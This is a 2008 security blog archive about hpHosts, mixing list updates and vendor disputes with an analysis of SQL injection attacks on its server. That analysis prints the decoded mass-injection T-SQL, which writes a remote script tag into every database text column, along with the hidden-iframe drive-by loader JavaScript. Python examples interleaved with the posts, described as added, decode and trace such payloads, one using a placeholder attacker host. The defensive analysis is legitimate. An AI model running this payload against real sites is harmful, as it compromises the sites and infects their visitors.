Blog for hpHosts, and whatever else I feel like writing about ....

Sunday, 31 August 2008

Enigma Software Group: Tracking the Hunter Part 2

I recently spoke with Alvin, CEO of ESG, and he also assured me that ESG dropped the affiliates that were involved in the spamming, always a good thing (whether or not they've re-registered as affiliates is anyone's guess - the internet provides a good enough level of anonymity for spammers, so it will be up to ESG to monitor their affiliates, and of course, whilst we certainly shouldn't be policing companies' affiliates, if we report those we do find doing wrong, we can also help).

View the full article;

Monday, 25 August 2008

hpHOSTS - UPDATED August 26th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 54,010 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 26/08/2008 11:12
  2. Last Verified: 26/08/2008 10:30
Download hpHosts now!

Sunday, 24 August 2008

Exploit efforts increased ......

You know you're doing something right when they ramp up their efforts.

I've been seeing these attacks for quite some time now, and they're getting ever more persistent, with the attacks more than doubling within the past few days. The exploit attempts show in the server log as;

2008-08-23 18:32:23 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C
(@S); 80 - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+InfoPath.1) - 200 0 0

Previously these attacks were aimed more toward the hpHosts server. Now, however, they're aimed at all of the servers on the network. Guess I'm annoying the right people?
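To pull payloads like the one in the log line above out of a log and see what they would do, here is a decoder. This is an added example for this post, not the blog's own tooling: it assumes W3C-format IIS log lines with the payload in the query string, and the log lines, the UTF-16 (NVARCHAR) variant and the script host evil.example inside it are constructed placeholders, not data from the post.

```python
"""Decode hex-encoded CAST() SQL-injection payloads out of IIS log lines.

Added example for this post, not the blog's own tooling. It assumes W3C
format IIS lines like the one quoted above, where the bot carries the whole
payload in the query string as
    ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x...%20AS%20CHAR(4000));EXEC(@S);
The log lines, the UTF-16 (NVARCHAR) variant and the script host
evil.example below are constructed placeholders, not data from the post.
"""
import re
from binascii import hexlify
from urllib.parse import unquote

# The hex literal inside CAST(0x... AS CHAR/NCHAR/VARCHAR/NVARCHAR(n)).
CAST_HEX_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.I)
# The tag the decoded cursor splices into every text column.
SCRIPT_SRC_RE = re.compile(r"<script\s+src=([^>\s]+)>", re.I)


def decode_cast_hex(hex_digits):
    """Turn the 0x... literal back into text.

    These payloads circulated as CAST(... AS CHAR) over plain ASCII bytes and
    as CAST(... AS NVARCHAR) over UTF-16LE bytes (every second byte 0x00).
    Sniff the zero bytes rather than trusting the declared type, because the
    SQL around the literal varied from wave to wave.
    """
    raw = bytes.fromhex(hex_digits)
    if len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def extract_payloads(log_line):
    """Return every decoded CAST() payload carried by one log line."""
    return [decode_cast_hex(h) for h in CAST_HEX_RE.findall(unquote(log_line))]


def injected_script_sources(sql):
    """Return the src= of each <script> the decoded SQL would write into the DB."""
    return sorted({m.strip("'\"") for m in SCRIPT_SRC_RE.findall(sql)})


def scan_log(lines):
    """Run the decoder over an iterable of log lines; one record per payload."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        for sql in extract_payloads(line):
            hits.append({
                "line": lineno,
                "walks_sysobjects": "sysobjects" in sql.lower(),
                "script_src": injected_script_sources(sql),
                "sql": sql,
            })
    return hits


# ---- constructed sample data -------------------------------------------
# The cursor the post decoded, with a placeholder script host. It appends
# TAG to every char/text/varchar/nvarchar column (xtype 99/35/231/167) of
# every user table (xtype 'u') that does not already carry it.
TAG = '"></title><script src=http://evil.example/b.js></script><!--'
INJECTED_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,"
    "syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 "
    "or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM "
    "Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] "
    "set ['+@C+']=''" + TAG + "''+['+@C+'] where '+@C+' not like ''%" + TAG + "''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor "
    "DEALLOCATE Table_Cursor"
)


def sample_log_lines():
    """Three constructed IIS lines: a normal request and two injection attempts."""
    ascii_hex = hexlify(INJECTED_SQL.encode("ascii")).decode()
    utf16_hex = hexlify(INJECTED_SQL.encode("utf-16-le")).decode()
    ua = "Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)"
    return [
        "2008-08-23 18:32:01 GET /misc/readme.txt - 80 - 192.0.2.10 " + ua + " 200 0 0",
        # CHAR flavour, the shape quoted in the post.
        "2008-08-23 18:32:23 GET /misc/cyberdefender/CDESGAd_100507_Full.txt "
        ";DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x" + ascii_hex +
        "%20AS%20CHAR(4000));EXEC(@S); 80 - 192.0.2.10 " + ua + " 200 0 0",
        # NVARCHAR flavour: same cursor, UTF-16LE bytes in the literal.
        "2008-08-23 18:33:07 GET /default.asp id=1;DECLARE%20@S%20NVARCHAR(4000);"
        "SET%20@S=CAST(0x" + utf16_hex + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - "
        "192.0.2.11 " + ua + " 200 0 0",
    ]


if __name__ == "__main__":
    for hit in scan_log(sample_log_lines()):
        print(f"line {hit['line']}: cursor over sysobjects={hit['walks_sysobjects']}, "
              f"injects {hit['script_src']}")
```

Run it over a real log with scan_log(open(path, encoding="latin-1")). A hit with walks_sysobjects set is this campaign whatever the surrounding SQL looks like, and the script_src list is what to block at the gateway and feed into the hosts file.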

The CAST string in the log line is hex encoded. Note that on this server the request hit a static .txt file, so IIS simply served it and logged a 200; the payload only does anything on a dynamic page that concatenates the query string into a SQL Server query, and the bots spray it at every URL regardless. It decodes to;

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=''"></title><script src=""></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src=""></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

This then loads;

vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://
Server IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 3
Date: 24 August 2008
Time: 16:30:54:30
document.write("<iframe width=0 height=0 src=hxxp://></iframe>");
return true;
var js2eus=1;

var yesdata;
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=hxxp://'+yesdata+' height=0 width=0></iframe>');

document.write("<iframe width=0 height=0 src=hxxp://></iframe>");


function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

Which loads;

vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://
Server IP: [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 2
iFrames: 5
Date: 24 August 2008
Time: 16:31:27:31
<script src='hxxp://' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="hxxp://"></script> is using FastFlux and loads;

vURL Desktop Edition v0.3.4 Results
Source code for: hxxp://
Server IP: [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
    > [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 24 August 2008
Time: 16:39:34:39
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.42642600 1219592199';
var cnzz_a=gc_cnzz("cnzz_a1019605");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
document.write('<a href="hxxp://" target=_blank title="站长统计">站长统计</a>');
document.write('<img src="hxxp://'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
document.cookie="cnzz_a1019605="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";
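The chain above is three stages of nothing but loaders: a script that document.write()s zero-size iframes, a page of further iframes plus a remote script, and a counter script at the end. Here is an offline dissector for that kind of chain, as an added example: it is not vURL's code and not from the post, and the URL-to-page map with the hostnames stage1.example, stage2.example and stats.example in it is a constructed stand-in for fetched pages.

```python
"""Dissect a drive-by chain of hidden iframes and remote scripts, offline.

Added example: not vURL's code and not from the post. A constructed map of
URL -> page body stands in for fetching pages; the hosts in it
(stage1.example, stage2.example, stats.example) are placeholders. It does
what the vURL reports above summarise by hand: every stage is a page whose
only job is to pull in the next one, through zero-size iframes or
<script src>, some of them emitted via document.write().
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# JS string literals; document.write("<iframe ...>") hides its markup in one
# of these, so a plain HTML parse of the page never sees the iframe.
STRING_LITERAL_RE = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")


def is_hidden(attrs):
    """An iframe sized to nothing or styled away: the loader's usual disguise."""
    a = {k.lower(): (v or "") for k, v in attrs}

    def tiny(key):
        return a.get(key, "").strip().rstrip("px") in ("0", "1")

    style = a.get("style", "").replace(" ", "").lower()
    return (tiny("width") and tiny("height")) or "display:none" in style \
        or "visibility:hidden" in style


class StageParser(HTMLParser):
    """Collect (kind, absolute_url, hidden) for every iframe and script src."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.loads = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script":
            self._in_script = True
            if src:
                self.loads.append(("script", urljoin(self.base_url, src), False))
        elif tag == "iframe" and src:
            self.loads.append(("iframe", urljoin(self.base_url, src), is_hidden(attrs)))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inside <script>, re-parse each string literal that looks like markup,
        # so document.write('<iframe ...>') is recorded like static HTML.
        if not self._in_script:
            return
        for _, literal in STRING_LITERAL_RE.findall(data):
            if "<" in literal:
                sub = StageParser(self.base_url)
                sub.feed(literal.replace('\\"', '"').replace("\\'", "'"))
                self.loads.extend(sub.loads)


def walk_chain(pages, start, max_depth=5):
    """Follow every iframe/script from `start`, depth first, one visit per URL.

    `pages` maps URL -> body, as a fetcher would return it. A URL that is not
    in the map is kept as an unfetched leaf, which is what a live run sees
    when a fast-flux host has already stopped resolving.
    """
    seen, chain = set(), []

    def visit(url, depth, via):
        if url in seen or depth > max_depth:
            return
        seen.add(url)
        body = pages.get(url)
        loads = []
        if body is not None:
            # A bare .js file is all script: wrap it so the parser treats it as one.
            parser = StageParser(url)
            parser.feed(f"<script>{body}</script>" if url.endswith(".js") else body)
            loads = parser.loads
        chain.append({
            "url": url, "via": via, "depth": depth, "fetched": body is not None,
            "hidden_iframes": sum(1 for kind, _, hidden in loads if kind == "iframe" and hidden),
            "loads": [(kind, target) for kind, target, _ in loads],
        })
        for kind, target, _ in loads:
            visit(target, depth + 1, kind)

    visit(start, 0, "start")
    return chain


# Constructed stand-in for the fetched pages (three stages of loaders).
PAGES = {
    "http://stage1.example/b.js":
        'document.write("<iframe width=0 height=0 src=http://stage2.example/in.htm></iframe>");\n'
        "var yesdata;\n"
        "document.write('<iframe frameborder=0 src=http://stage2.example/cnt.htm height=0 width=0></iframe>');",
    "http://stage2.example/in.htm":
        "<script src='http://stats.example/c.js' charset='gb2312'></script>\n"
        "<iframe src=flash.htm width=100 height=10></iframe>\n"
        "<iframe src=06014.html width=100 height=10></iframe>\n",
    "http://stage2.example/cnt.htm": "<html><body></body></html>",
    "http://stage2.example/flash.htm": "<html><body><object></object></body></html>",
    # 06014.html is deliberately absent: a stage whose host no longer resolves.
    "http://stats.example/c.js":
        "document.write('<img src=\"http://stats.example/p.gif?r=1\" width=0 height=0>');",
}


if __name__ == "__main__":
    for stage in walk_chain(PAGES, "http://stage1.example/b.js"):
        print("  " * stage["depth"] + f"{stage['url']} (via {stage['via']}, "
              f"fetched={stage['fetched']}, hidden iframes={stage['hidden_iframes']})")
```

Swap PAGES for a real fetcher and the same walk gives you every host in the chain to list, plus the ones that failed to resolve, which on a fast-flux host is usually most of them by the time you look.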

Server maintenance

This is a quick note to let you all know that in 11 hours (approx 23:00 GMT), the gateway will be taken offline for maintenance. This is to allow more stringent filters to be put in place, and to move from Windows to Linux, as the abnormal amount of traffic keeps increasing and overloading the server.

A backup server will be put in place to minimize the downtime. Affected sites include;


Thursday, 21 August 2008

Enigma Software Group removed from hpHosts

As a quick note prior to my next article, I'd like to announce the removal of Enigma Software Group from the hpHosts database.

ESG were listed with the FSA (Fraudulent Security Application) classification. However, my recent testing of SpyHunter, coupled with my research into their current practices, has shown they no longer fit the inclusion criteria. ESG have cleaned house concerning the issues raised in last year's article, and have further modified their adverts to prevent confusion.

ESG could have just gone on the offensive and threatened to sue all and sundry, but instead they've worked to resolve issues and build relationships rather than destroying them further. This is always a good thing, for the security community as a whole, and more importantly - for you, the user.

Wednesday, 20 August 2008

Enigma Software Group - SpyHunter and Misleading adverts

I re-tested SpyHunter (see references) an hour or two ago, and am pleased to say the rogue behaviour I previously witnessed is all but gone - the only problems I now have with the actual program itself are;

1. It still requires payment to remove cookies
2. It still does not come with a fully functional trial

However, as I mentioned to Alvin (CEO, Enigma Software Group), I DO have a major problem with ESG themselves, or rather, their misleading advertising practices.

Rather than re-hash it, I'll simply repeat what I sent to Alvin concerning the issue;
Whilst SH itself seems to be no longer presenting with rogue behaviour, I DO still have concerns over ESG's practices, namely the advertising practices. An example of this is;

In the right column, there's an advert which claims to lead to "www{DOT}". This is misleading as it actually leads to "www{DOT}".


On top of this is the advert itself;

"Remove VirusHeal (Free)
How to Remove VirusHeal.
VirusHeal Removal Instructions."

We all know the "(Free)" isn't actually free - it requires payment for SH (yep, there may be manual instructions, but that’s not mentioned in the advert, so is irrelevant).

Though just one example, it's not isolated to the specific keywords I used for this example - ESG need to resolve this and cease using these practices.


Since publishing this, I've had a response from Alvin on my concerns. Firstly concerning the cookies;
You are entitled to your opinion on this point, I concede that giving cookie
deletion for FREE is reasonable because they are quite harmless, but the
issue is my larger commercial competitors: PCTools, Webroot, Alluria, etc...
Since they are all "pay to remove" cookies, files, and registry entries, and
I know you are aware of this fact. I have to be as competitive as they are.
However, I am open to the idea of removing cookies for free. I have to admit
that is an interesting point....

If SH changes to remove cookies for free, then that's great.

Secondly, on the Google adverts, Alvin advised me that Google has a length restriction on the URL that's placed in the part I mentioned, which explains why it displays as it does. However, in response to this, I've advised that a better option would be to have the main hostname there, instead of the sub-domain part. He's also advised me that he's ordered his marketing manager to remove the word "free" from the adverts. Definitely a good step.

His response to the adverts was rather lengthy to be placed here, so I've posted the abridged version instead;
Steven, in all honesty, the Google PPC backend has a display URL character
limit, so it is a major pain in the behind to have a descriptive sub-domain.
This is not done for any deceptive or malicious reason. This is done so we
can be as descriptive as possible. Have you ever conducted paid campaigns on
Google? You will see what I mean... That bottom field is mandatory... In
fact, it is a useless field. I would rather they get rid of it and allow
more room to be more descriptive on paid ads.

..... snipped
2. On top of this is the advert itself;

"Remove VirusHeal (Free)
How to Remove VirusHeal.
VirusHeal Removal Instructions."

We all know the "(Free)" isn't actually free - it requires payment for SH
(yep, there may be manual instructions, but that's not mentioned in the
advert, so is irrelevant).

I agree with you on this statement. To say free manual instructions in the
description makes more sense, but I do not want to see the terms "FREE &
REMOVE" on the ad. As you said, it is irrelevant.

This would have been as effective:

Remove VirusHeal
How to Remove VirusHeal.
VirusHeal Removal Instructions

(If it looks a bit weird still, again there is a character restriction per
line on Google Adwords)

I officially ordered my Adwords manager to remove any reference of the word
FREE, so do not go crazy on me if it takes a few days ;) OK? Since it is a
manual task, and the Google Adwords interface is clunky, so bear with me and
then review the changes.

Again, I agree with you on this point, since having the term "FREE" on that
ad is not a value added term for converting customers anyway.


Enigma Software Group: Tracking the Hunter

Tuesday, 19 August 2008

Brothersoft gives an example of how best to annoy me ..

Alas, annoying me isn't an easy thing to do; I'm a very patient and normally placid person, but as with everyone else, some things just get my goat, and Brothersoft is one of those things.

Long story short, I've been receiving e-mails from them for some time now, containing;
Hello [ ] [ ]:

In order to prevent unauthorized sign-ups, we want you to confirm your registration request. Verification will allow you to access site features and information only available with registration.

Please confirm your registration by clicking the link:

Please do not reply to this message, as no recipient has been designated. Replying to this message will not confirm your registration.

Note: If you experience problems with the provided link, simply copy and paste the link above into the address field within your browser.

BrotherSoft Team

Needless to say, I've sent them numerous e-mails telling them I neither requested nor want the account. Most of the time my e-mails have gone unanswered; sometimes I've had a reply such as;
OK, removed. Please come back and check.



My last e-mail to them however, resulted in their sending me the following;
Sorry to inform you that your account has been disabled by Brothersoft because of rule infringement.
During this period, you cannot submit or manage your software.
If any problem or question, please feel free to contact us.

BrotherSoft Team

Oh dear, they've sent me an e-mail telling me my account has been blocked for rule infringement, fantastic - but I DID NOT ASK FOR THE DAMN ACCOUNT TO BEGIN WITH!!!

Saturday, 16 August 2008

Abnormally high traffic

Alas, there is still abnormally high traffic on the hpHosts server. I've been keeping an eye on the server logs over the past few months, and it is apparent that it's either due to HostsMan users sending extremely frequent requests (as mentioned previously) OR lots of people faking the HostsMan user agent (I spoke to HM's developer some time ago and he pondered whether it could be someone faking the UA as well).

I'm having the server + gateway re-booted as I write this, and will go through the logs once I've got RD access again.

On the plus side, I've also spoken to the developer of WK (the filter I implemented for the server) and he's advised me on how to resolve the access issues for Free Download Manager users. I'll be sorting this out tomorrow.

Tuesday, 12 August 2008

Server filter still causing access problems .....

It seems the filter I implemented is still causing access problems, this time for those using Free Download Manager (I'll refrain from re-publishing my disdain for this program here - see the forums for the story).

I am working on resolving this, and have actually removed the filter match that appeared to be causing it (based on the log files, anyway). However, in the meantime, those using FDM who are unable to access either the forums or the website can download the hpHosts file from the alternate mirrors below;


Windows (ZIP) (also suitable for Linux) (Courtesy Security Cadets)

Windows (Setup) (Courtesy Security Cadets)


If you would like to provide an additional mirror, please get in touch

hpHOSTS - UPDATED August 13th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 53,668 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 13/08/2008 03:30
  2. Last Verified: 13/08/2008 03:45

Download hpHosts now!

HOSTS files, IP blacklists, toolbars - is it enough?

Back in 2006, I wrote an article on the HOSTS file, and how it improved the security of your computer. That hasn't changed, but the malware scene has, and with it the protection your computer needs has changed drastically.

HOSTS files

A HOSTS file has never been enough on its own to protect you, for two reasons. It is far too easy for a malicious program (and, depending on your browser settings, a malicious web page) to completely change or remove the HOSTS file in seconds, so at the very least you need a program monitoring the file for changes, such as WinPatrol. And it is limited to blocking individual hostnames: it cannot, for example, do a wildcard block such as *, it cannot block IP addresses, and anything that connects to an address directly rather than by name never consults it at all. So what else is needed?
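As an added example (not from the article, and not part of hpHosts), here is a parser and audit for the HOSTS file that makes those limits concrete: matching is exact-hostname only, a connection by IP literal is never caught, and any line can be re-pointed, which is what a change monitor has to catch. The sample file and the hostnames in it (ads.example, tracker.example, av-vendor.example) are constructed.

```python
"""Parse and audit a HOSTS file.

Added example, not part of the article or of hpHosts. It assumes the
standard HOSTS syntax (one IP followed by one or more hostnames per line,
'#' starting a comment) and a constructed sample file; the hostnames in
the sample (ads.example, tracker.example, av-vendor.example) are
placeholders. It shows the limits the article describes: a blocklist entry
matches exactly one hostname, so sub-domains and IP-literal connections
walk straight past it, and nothing stops a line being rewritten to send a
site to an attacker's address, so the file has to be watched.
"""
import ipaddress

# Addresses a blocklist entry sinks a name to.
BLACKHOLE = {"127.0.0.1", "0.0.0.0", "::1"}


def parse_hosts(text):
    """Return {hostname: ip}. The first entry for a name is kept, which is
    how glibc reads the file; check your own resolver if order matters."""
    table = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            table.setdefault(name.lower(), ip)
    return table


def is_blocked(table, hostname):
    """True only for an exact hostname match: no wildcards, so sub.ads.example
    is not covered by an ads.example entry, and an IP literal never is."""
    try:
        ipaddress.ip_address(hostname)
        return False  # connecting by IP bypasses HOSTS entirely
    except ValueError:
        pass
    return table.get(hostname.lower()) in BLACKHOLE


def audit_hosts(text, expected_blocked=()):
    """Flag anything other than sinking names: an entry pointing a name at a
    real address is the classic hijack of an AV or update site, and an
    expected blocklist entry that is missing means the file was edited."""
    table = parse_hosts(text)
    findings = []
    for name, ip in table.items():
        if ip in BLACKHOLE:
            continue
        try:
            ipaddress.ip_address(ip)
            findings.append(("redirect", name, ip))
        except ValueError:
            findings.append(("unparseable", name, ip))
    for name in expected_blocked:
        if not is_blocked(table, name):
            findings.append(("missing", name, table.get(name.lower())))
    return findings


def diff_hosts(old_text, new_text):
    """What a change monitor should report: names added, removed or re-pointed."""
    old, new = parse_hosts(old_text), parse_hosts(new_text)
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "repointed": sorted(n for n in set(old) & set(new) if old[n] != new[n]),
    }


# Constructed sample: a clean file with a blocklist appended, then the same
# file after a malicious program rewrote it.
CLEAN_HOSTS = """\
# hosts file with a blocklist appended
127.0.0.1   localhost
::1         localhost
127.0.0.1   ads.example
127.0.0.1   tracker.example  cdn.tracker.example
"""

TAMPERED_HOSTS = """\
127.0.0.1   localhost
::1         localhost
127.0.0.1   ads.example
198.51.100.7   av-vendor.example update.av-vendor.example   # hijack
"""

if __name__ == "__main__":
    table = parse_hosts(CLEAN_HOSTS)
    for host in ("ads.example", "sub.ads.example", "cdn.tracker.example", "203.0.113.9"):
        print(f"{host:22} blocked={is_blocked(table, host)}")
    print(audit_hosts(TAMPERED_HOSTS, expected_blocked=["tracker.example"]))
    print(diff_hosts(CLEAN_HOSTS, TAMPERED_HOSTS))
```

Keeping a copy of the file you installed and running diff_hosts against the live one on a timer is the minimum a monitor needs to do; the "redirect" findings are the ones to treat as an incident rather than a tidy-up.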

Announcement & Comments:

Full article published at:

Monday, 11 August 2008

Bah, another Blogspot problem ......

Yep, I've noticed another problem with this blog - I've got it set to pull the latest additions to hpHosts, and for some reason it hasn't realised that there have been additions today - it still thinks the last 5 additions were; - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008

.... but nope, the last 5 additions were actually;

2 89-149-194-33.internetser PSH


Yeah - I publish this and the damn thing updates itself, and still incorrectly ....... wtf? And why is it still saying the 10th? - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008 - 10-Aug-2008

Thursday, 7 August 2008

vURL Desktop Edition



Added: Detect all IPs that a hostname resolves to (including rDNS for those IPs)

Modified: Source button now enabled when clicking to view application log before dissecting site
Modified: Redesigned settings dialog
Modified: Various other modifications

There's also a new change on the Links tab, but I'll let you guys see if you can tell what it is

Wednesday, 6 August 2008

New hpHosts release

hpHOSTS - UPDATED August 6th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 53,525 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)

  1. Latest Updated: 06/08/2008 18:30
  2. Last Verified: 06/08/2008 18:15

Download hpHosts now!

Tuesday, 5 August 2008

First post .....

Well, I finally got round to creating this, and still don't know if I'll be keeping it.

Anywho, until I decide whether to go with this - or just create a blog myself, then err, welcome hehe.